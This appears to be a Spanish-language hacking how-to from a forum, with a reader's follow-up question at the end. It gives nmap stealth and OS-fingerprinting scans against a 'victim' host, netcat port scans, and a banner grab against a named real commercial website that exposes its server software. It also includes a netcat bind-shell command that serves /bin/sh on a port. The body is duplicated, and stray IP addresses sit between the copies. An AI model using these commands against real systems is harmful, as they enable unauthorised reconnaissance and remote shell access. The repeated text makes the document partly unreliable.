trabajando con nmap
nmap -O -o archivo.log www.victima.com -PT0 -sX -p 1-65535
nmap <ip> -sX -p 1-1024
nmap www.victima.com -n
netcat
nc -v -v -z <ip> 1-1024 --> scanear
nc -v -p 23 <ip> -t 23 --> telnetear
sacar info por el puerto 80
nc -v www.deprati.com.ec 80
Warning: inverse host lookup failed for 65.199.173.90: Unknown host
www.deprati.com.ec [65.199.173.90] 80 (http) open
get
informaicon de la page y del sistema, en este caso es un
HTTP/1.1 400 Bad Request
Server: Microsoft-IIS/5.0
Date: Tue, 26 Aug 2003 16:23:03 GMT
Content-Type: text/html
Content-Length: 87
podemos dejar puertos en escucha
nc -n -l -p 666
o ejecutar
nc -n -l -p 666 -e /bin/sh
eso es todo por hoy gracias. NO PRACTIQUES EL HIJAKCING PARA DESTRUIR SINO PARA APRENDER
200.93.204.196
66.198.136.166
trabajando con nmap
nmap -O -o archivo.log www.victima.com -PT0 -sX -p 1-65535
nmap <ip> -sX -p 1-1024
nmap www.victima.com -n
netcat
nc -v -v -z <ip> 1-1024 --> scanear
nc -v -p 23 <ip> -t 23 --> telnetear
sacar info por el puerto 80
nc -v www.deprati.com.ec 80
Warning: inverse host lookup failed for 65.199.173.90: Unknown host
www.deprati.com.ec [65.199.173.90] 80 (http) open
get
informaicon de la page y del sistema, en este caso es un
HTTP/1.1 400 Bad Request
Server: Microsoft-IIS/5.0
Date: Tue, 26 Aug 2003 16:23:03 GMT
Content-Type: text/html
Content-Length: 87
podemos dejar puertos en escucha
nc -n -l -p 666
o ejecutar
nc -n -l -p 666 -e /bin/sh
eso es todo por hoy gracias. NO PRACTIQUES EL HIJAKCING PARA DESTRUIR SINO PARA APRENDER
Podrías indicar para que sirven cada una de las opciones .. por ejemplo :
nc -n -l -p 666 -e /bin/sh
-n puede ser de number
-l puede ser de list
-e hum... execute ?
Gracias por enseñar !!